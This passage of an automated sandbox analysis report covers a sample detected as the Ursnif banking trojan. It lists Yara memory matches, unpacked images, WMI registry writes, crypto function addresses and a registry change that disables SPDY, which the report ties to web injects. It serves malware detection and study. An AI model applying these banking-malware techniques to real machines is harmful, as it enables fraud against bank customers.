Source: Yara match File source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
Source: Yara match File source: 0.3.loaddll32.exe.3978d40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5488d40.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.53da4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.53da4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.54594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.38ca4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.38ca4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.3.loaddll32.exe.10d8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4f694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.db8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.49594a0.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.ef8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 0_2_00DD3FAB

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B2274 0_2_6E4B2274
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD2654 0_2_00DD2654
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD7E30 0_2_00DD7E30
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD4FA7 0_2_00DD4FA7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04572C07 0_2_04572C07
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04572499 0_2_04572499
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04565518 0_2_04565518
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0456AD2E 0_2_0456AD2E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457C5F4 0_2_0457C5F4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04574658 0_2_04574658
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0456279B 0_2_0456279B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_045788BB 0_2_045788BB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0456E9BD 0_2_0456E9BD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04564AFE 0_2_04564AFE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_045852A0 0_2_045852A0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04582339 0_2_04582339
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB2499 3_2_04BB2499
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB2C07 3_2_04BB2C07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BBC5F4 3_2_04BBC5F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BAAD2E 3_2_04BAAD2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA5518 3_2_04BA5518
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB4658 3_2_04BB4658
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA279B 3_2_04BA279B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB88BB 3_2_04BB88BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BAE9BD 3_2_04BAE9BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BC52A0 3_2_04BC52A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA4AFE 3_2_04BA4AFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BC2339 3_2_04BC2339
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04A77E30 5_2_04A77E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04A72654 5_2_04A72654
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04A74FA7 5_2_04A74FA7
Source: C:\Windows\System32\control.exe Code function: 34_2_0093F2F0 34_2_0093F2F0
Source: C:\Windows\System32\control.exe Code function: 34_2_0093B530 34_2_0093B530
Source: C:\Windows\System32\control.exe Code function: 34_2_0093179C 34_2_0093179C
Source: C:\Windows\System32\control.exe Code function: 34_2_0094508C 34_2_0094508C
Source: C:\Windows\System32\control.exe Code function: 34_2_009340B4 34_2_009340B4
Source: C:\Windows\System32\control.exe Code function: 34_2_0094E0CF 34_2_0094E0CF
Source: C:\Windows\System32\control.exe Code function: 34_2_00923804 34_2_00923804
Source: C:\Windows\System32\control.exe Code function: 34_2_0092E008 34_2_0092E008
Source: C:\Windows\System32\control.exe Code function: 34_2_00937834 34_2_00937834
Source: C:\Windows\System32\control.exe Code function: 34_2_0094C874 34_2_0094C874
Source: C:\Windows\System32\control.exe Code function: 34_2_00929074 34_2_00929074
Source: C:\Windows\System32\control.exe Code function: 34_2_00933074 34_2_00933074
Source: C:\Windows\System32\control.exe Code function: 34_2_00944988 34_2_00944988
Source: C:\Windows\System32\control.exe Code function: 34_2_009459A8 34_2_009459A8
Source: C:\Windows\System32\control.exe Code function: 34_2_0093D9AC 34_2_0093D9AC
Source: C:\Windows\System32\control.exe Code function: 34_2_0093C1D4 34_2_0093C1D4
Source: C:\Windows\System32\control.exe Code function: 34_2_0092B1D8 34_2_0092B1D8
Source: C:\Windows\System32\control.exe Code function: 34_2_0093C9F0 34_2_0093C9F0
Source: C:\Windows\System32\control.exe Code function: 34_2_0093D150 34_2_0093D150
Source: C:\Windows\System32\control.exe Code function: 34_2_0094D2DC 34_2_0094D2DC
Source: C:\Windows\System32\control.exe Code function: 34_2_009432EC 34_2_009432EC
Source: C:\Windows\System32\control.exe Code function: 34_2_00938218 34_2_00938218
Source: C:\Windows\System32\control.exe Code function: 34_2_00937278 34_2_00937278
Source: C:\Windows\System32\control.exe Code function: 34_2_0094AA6C 34_2_0094AA6C
Source: C:\Windows\System32\control.exe Code function: 34_2_00926A68 34_2_00926A68
Source: C:\Windows\System32\control.exe Code function: 34_2_00939268 34_2_00939268
Source: C:\Windows\System32\control.exe Code function: 34_2_0094EB10 34_2_0094EB10
Source: C:\Windows\System32\control.exe Code function: 34_2_00936B1C 34_2_00936B1C
Source: C:\Windows\System32\control.exe Code function: 34_2_00922B74 34_2_00922B74
Source: C:\Windows\System32\control.exe Code function: 34_2_009464F4 34_2_009464F4
Source: C:\Windows\System32\control.exe Code function: 34_2_00933C24 34_2_00933C24
Source: C:\Windows\System32\control.exe Code function: 34_2_00930474 34_2_00930474
Source: C:\Windows\System32\control.exe Code function: 34_2_0093ED94 34_2_0093ED94
Source: C:\Windows\System32\control.exe Code function: 34_2_0094DD9C 34_2_0094DD9C
Source: C:\Windows\System32\control.exe Code function: 34_2_009385CC 34_2_009385CC
Source: C:\Windows\System32\control.exe Code function: 34_2_00938DF4 34_2_00938DF4
Source: C:\Windows\System32\control.exe Code function: 34_2_00949524 34_2_00949524
Source: C:\Windows\System32\control.exe Code function: 34_2_00937D44 34_2_00937D44
Source: C:\Windows\System32\control.exe Code function: 34_2_0093FD6C 34_2_0093FD6C
Source: C:\Windows\System32\control.exe Code function: 34_2_0092C6F4 34_2_0092C6F4
Source: C:\Windows\System32\control.exe Code function: 34_2_00946E34 34_2_00946E34
Source: C:\Windows\System32\control.exe Code function: 34_2_00928628 34_2_00928628
Source: C:\Windows\System32\control.exe Code function: 34_2_0092779C 34_2_0092779C
Source: C:\Windows\System32\control.exe Code function: 34_2_0093DFB8 34_2_0093DFB8
Source: C:\Windows\System32\control.exe Code function: 34_2_00943F08 34_2_00943F08
Source: C:\Windows\System32\control.exe Code function: 34_2_00939770 34_2_00939770
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DF2F0 45_2_000002D2D67DF2F0
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DB530 45_2_000002D2D67DB530
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C6A68 45_2_000002D2D67C6A68
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67EEB10 45_2_000002D2D67EEB10
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E3F08 45_2_000002D2D67E3F08
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67CC6F4 45_2_000002D2D67CC6F4
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E32EC 45_2_000002D2D67E32EC
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67ED2DC 45_2_000002D2D67ED2DC
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C2B74 45_2_000002D2D67C2B74
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D9770 45_2_000002D2D67D9770
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D6B1C 45_2_000002D2D67D6B1C
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67CE008 45_2_000002D2D67CE008
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C3804 45_2_000002D2D67C3804
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DDFB8 45_2_000002D2D67DDFB8
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C779C 45_2_000002D2D67C779C
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D179C 45_2_000002D2D67D179C
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E508C 45_2_000002D2D67E508C
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67EC874 45_2_000002D2D67EC874
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C9074 45_2_000002D2D67C9074
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D3074 45_2_000002D2D67D3074
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D0474 45_2_000002D2D67D0474
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D7834 45_2_000002D2D67D7834
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D3C24 45_2_000002D2D67D3C24
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E64F4 45_2_000002D2D67E64F4
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67EE0CF 45_2_000002D2D67EE0CF
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D40B4 45_2_000002D2D67D40B4
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E4988 45_2_000002D2D67E4988
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DFD6C 45_2_000002D2D67DFD6C
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DD150 45_2_000002D2D67DD150
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D7D44 45_2_000002D2D67D7D44
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E9524 45_2_000002D2D67E9524
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D8DF4 45_2_000002D2D67D8DF4
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DC9F0 45_2_000002D2D67DC9F0
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67CB1D8 45_2_000002D2D67CB1D8
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DC1D4 45_2_000002D2D67DC1D4
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D85CC 45_2_000002D2D67D85CC
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DD9AC 45_2_000002D2D67DD9AC
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E59A8 45_2_000002D2D67E59A8
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67EDD9C 45_2_000002D2D67EDD9C
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DED94 45_2_000002D2D67DED94
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D7278 45_2_000002D2D67D7278
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67EAA6C 45_2_000002D2D67EAA6C
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D9268 45_2_000002D2D67D9268
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67E6E34 45_2_000002D2D67E6E34
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C8628 45_2_000002D2D67C8628
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67D8218 45_2_000002D2D67D8218
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_009788BB 49_2_009788BB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0096E9BD 49_2_0096E9BD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_009852A0 49_2_009852A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00964AFE 49_2_00964AFE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00982339 49_2_00982339
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00972499 49_2_00972499
